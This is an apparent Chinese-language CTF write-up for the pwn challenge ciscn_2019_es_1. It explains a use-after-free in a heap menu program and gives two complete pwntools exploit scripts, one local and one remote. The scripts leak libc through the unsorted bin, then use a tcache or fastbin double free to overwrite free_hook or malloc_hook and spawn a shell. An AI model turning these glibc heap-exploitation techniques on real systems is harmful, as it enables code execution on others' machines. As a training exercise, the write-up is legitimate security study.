ciscn_2019_es_1

提示说是libc2.29,但是好像上错libc版本了。

简单分析

1
2
3
4
1.Add a 996 info
2.Show info
3.Call that 996 compary!
4.I hate 996!

每次add会malloc(0x18)来创建一个chunk记录信息,其结构为:

1
2
3
	name ----------> content chunk
size | call
call

call即free,free(*name),没有置零,存在UAF。

利用思路

ubuntu18.04本地

先把tcache填满,然后利用UAF,show出unsortbin中的main_arena地址,获取libc地址。

再double free,改写tcache的fd指针至free_hook,再次malloc控制free_hook,写上system,free一块内容为/bin/sh的chunk获取shell。

BUU remote

直接利用UAF,show出unsortbin中的main_arena地址,获取libc地址。
再double free,改写fastbin的fd指针至malloc_hook-0x23,再次malloc控制malloc_hook,写上onegadget,执行获取shell。

//不知道是不是BUU上面所有题都无视题目本身用了给的那两个libc,如果是这样的话感觉做题不是很方便啊。

libc2.29

好像2.29里tcache就完全不能double free了,会遍历tcache,但是leak还是先填满tcache然后leak。double free就用fastbin,改写fastbin的fd指针至malloc_hook-0x23,再次malloc控制malloc_hook,写上onegadget,执行获取shell。

//纯猜测,没有2.29环境

EXP

ubuntu18.04本地

1
#coding=UTF-8
from pwn import *
sh=process("./ciscn_2019_es_1.dms")
#sh=remote("f.buuoj.cn",20173)
def add(size,name,call):
	sh.sendlineafter("choice:","1")
	sh.sendlineafter("\n",str(int(size)))
	sh.sendafter("\n",name)
	sh.sendafter("\n",call)
def show(index):
	sh.sendlineafter("choice:","2")
	sh.sendlineafter("\n",str(index))
def delete(index):
	sh.sendlineafter("choice:","3")
	sh.sendlineafter("\n",str(index))
add(0x80,"tcache","tcache") 		 #index0
add(0x80,"/bin/sh\x00","/bin/sh\x00") #index1
for i in range(8):
	delete(0)
show(0)
sh.recvuntil("name:\n")
leak=u64(sh.recv(6).ljust(8,"\x00"))
main_arena=leak-96
log.success("main_arena: "+hex(main_arena))
free_hook=main_arena+7336
log.success("free_hook: "+hex(free_hook))
system=main_arena-0x39c800
log.success("system: "+hex(system))
add(0x90,"2","2") #index2
delete(2)
delete(2)
add(0x90,p64(free_hook),"call")
add(0x90,p64(free_hook),"call")
add(0x90,p64(system),"call")
delete(1)
sh.interactive()

BUU remote

1
#coding=UTF-8
from pwn import *
from LibcSearcher import *
#sh=process("./ciscn_2019_es_1.dms")
onegadget=[0x45216,0x4526a,0xf02a4,0xf1147]
sh=remote("f.buuoj.cn",20173)
def add(size,name):
	sh.sendlineafter("choice:","1")
	sh.sendlineafter("\n",str(int(size)))
	sh.sendafter("\n",name)
	sh.sendafter("\n","call")
def show(index):
	sh.sendlineafter("choice:","2")
	sh.sendlineafter("\n",str(index))
def delete(index):
	sh.sendlineafter("choice:","3")
	sh.sendlineafter("\n",str(index))
add(0x80,"/bin/sh\x00") #index0
add(0x80,"/bin/sh\x00") #index1
delete(0)
show(0)
sh.recvuntil("name:\n")
leak=u64(sh.recv(6).ljust(8,"\x00"))
main_arena=leak-88
log.success("main_arena: "+hex(main_arena))
malloc_hook=main_arena-0x10
log.success("malloc_hook: "+hex(malloc_hook))
libcbase=main_arena-0x3C4B20
add(0x60,"2")
add(0x60,"3")
delete(2)
delete(3)
delete(2)
add(0x60,p64(malloc_hook-0x23))#index4
add(0x60,"5")
add(0x60,"6")
add(0x60,"a"*19+p64(libcbase+onegadget[2]))
delete(5)
delete(5)
sh.interactive()
文章目录
  1. 1. 简单分析
  2. 2. 利用思路
    1. 2.0.1. ubuntu18.04本地
    2. 2.0.2. BUU remote
    3. 2.0.3. libc2.29
  • 3. EXP
    1. 3.0.1. ubuntu18.04本地
    2. 3.0.2. BUU remote
  • |